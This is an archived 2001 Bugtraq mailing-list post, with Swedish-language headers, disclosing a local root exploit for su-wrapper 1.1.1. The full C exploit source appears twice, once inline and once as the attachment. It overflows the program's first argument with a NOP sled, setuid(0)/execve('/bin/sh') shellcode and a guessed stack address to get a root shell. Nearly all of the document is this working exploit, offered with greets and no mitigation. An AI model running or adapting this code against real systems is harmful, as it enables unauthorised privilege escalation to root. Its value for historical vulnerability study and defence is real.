6595655 2001-06-06 23:27 +0000 /113 rader/ dex <dexgod@softhome.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-07 23:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: dexgod@softhome.net
Mottagare: Bugtraq (import) <17309>
Ärende: su-wrapper 1.1.1 Local root exploit.
------------------------------------------------------------
/* - su-wrapper.c - */
/*************************************************************************/
/* /usr/sbin/su-wrapper(su-wrapper 1.1.1) local root exploit. */
/* */
/* Package Description: */
/* su-wrapper is an little util which lets special users execute */
/* processes under another uid/gid. */
/* */
/* Vulnerability Description: */
/* If a long line on the first argument is gived, the program sends */
/* a SIGSEGV Signal. */
/* */
/* Affected: All Systems who have su-wrapper installed :P */
/* */
/* I don't know if other versions are vulnerable too. */
/* */
/* This bug was reported to Enrico Weigelt (weigelt@nibiru.thur.de) */
/* */
/* Greets: NOP, dr_fdisk^, yield, vlad, dead, fatal, kuk, neuro, alt3kx, */
/* etc */
/* dex: dexgod@softhome.net <> http://www.raza-mexicana.org - */
/*************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFERSIZE 1032
#define OFFSET 0
#define ALIGN 0
static char shellcode[]=
"\x29\xc0" /* subl %eax, %eax */
"\xb0\x46" /* movb $70, %al */
"\x29\xdb" /* subl %ebx, %ebx */
"\xb3\x0c" /* movb $12, %bl */
"\x80\xeb\x0c" /* subb $12, %bl */
"\x89\xd9" /* movl %ebx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xeb\x18" /* jmp callz */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe3\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv) {
int i;
unsigned long addr;
char *buffer;
int buffersize = BUFFERSIZE;
int offset = OFFSET;
int align = ALIGN;
if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) align = atoi(argv[2]);
if(argc > 3) buffersize = atoi(argv[3]);
buffer = (char *)malloc(buffersize +8);
addr = get_sp() - offset;
for(i = 0; i < buffersize; i+=4) {
*(long *)&buffer[i] = 0x90909090;
}
*(long *)&buffer[buffersize - 4] = addr;
*(long *)&buffer[buffersize - 8] = addr;
memcpy(buffer + buffersize - 8 - strlen(shellcode) - align,
shellcode, strlen(shellcode));
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
printf("[x] su-wrapper 1.1.1 local root exploit\n"); printf("[x]
dex: - dexgod@softhome.net <> http://www.raza-mexicana.org - \n");
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[x] Address = 0x%x, Align = %d, Offset = %d\n", addr, align,
offset);
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[x] Exploiting...\n");
if ((execl("/usr/sbin/su-wrapper", "su-wrapper", buffer, NULL)) != 0) {
printf("Could not start su-wrapper, /usr/sbin/su-wrapper exists?\n");
}
}
(6595655) /dex <dexgod@softhome.net>/-----(Ombruten)
Bilaga (application/octet-stream) i text 6595656
6595656 2001-06-06 23:27 +0000 /110 rader/ dex <dexgod@softhome.net>
Bilagans filnamn: "su-wrapper.c"
Importerad: 2001-06-07 23:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: dexgod@softhome.net
Mottagare: Bugtraq (import) <17310>
Bilaga (text/plain) till text 6595655
Ärende: Bilaga (su-wrapper.c) till: su-wrapper 1.1.1 Local root exploit.
------------------------------------------------------------
/* - su-wrapper.c - */
/*************************************************************************/
/* /usr/sbin/su-wrapper(su-wrapper 1.1.1) local root exploit. */
/* */
/* Package Description: */
/* su-wrapper is an little util which lets special users execute */
/* processes under another uid/gid. */
/* */
/* Vulnerability Description: */
/* If a long line on the first argument is gived, the program sends */
/* a SIGSEGV Signal. */
/* */
/* Affected: All Systems who have su-wrapper installed :P */
/* */
/* I don't know if other versions are vulnerable too. */
/* */
/* This bug was reported to Enrico Weigelt (weigelt@nibiru.thur.de) */
/* */
/* Greets: NOP, dr_fdisk^, yield, vlad, dead, fatal, kuk, neuro, alt3kx, */
/* etc */
/* dex: dexgod@softhome.net <> http://www.raza-mexicana.org - */
/*************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFERSIZE 1032
#define OFFSET 0
#define ALIGN 0
static char shellcode[]=
"\x29\xc0" /* subl %eax, %eax */
"\xb0\x46" /* movb $70, %al */
"\x29\xdb" /* subl %ebx, %ebx */
"\xb3\x0c" /* movb $12, %bl */
"\x80\xeb\x0c" /* subb $12, %bl */
"\x89\xd9" /* movl %ebx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xeb\x18" /* jmp callz */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe3\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv) {
int i;
unsigned long addr;
char *buffer;
int buffersize = BUFFERSIZE;
int offset = OFFSET;
int align = ALIGN;
if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) align = atoi(argv[2]);
if(argc > 3) buffersize = atoi(argv[3]);
buffer = (char *)malloc(buffersize +8);
addr = get_sp() - offset;
for(i = 0; i < buffersize; i+=4) {
*(long *)&buffer[i] = 0x90909090;
}
*(long *)&buffer[buffersize - 4] = addr;
*(long *)&buffer[buffersize - 8] = addr;
memcpy(buffer + buffersize - 8 - strlen(shellcode) - align,
shellcode, strlen(shellcode));
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
printf("[x] su-wrapper 1.1.1 local root exploit\n"); printf("[x]
dex: - dexgod@softhome.net <> http://www.raza-mexicana.org - \n");
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[x] Address = 0x%x, Align = %d, Offset = %d\n", addr, align,
offset);
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[x] Exploiting...\n");
if ((execl("/usr/sbin/su-wrapper", "su-wrapper", buffer, NULL)) != 0) {
printf("Could not start su-wrapper, /usr/sbin/su-wrapper exists?\n");
}
}
(6595656) /dex <dexgod@softhome.net>/-----(Ombruten)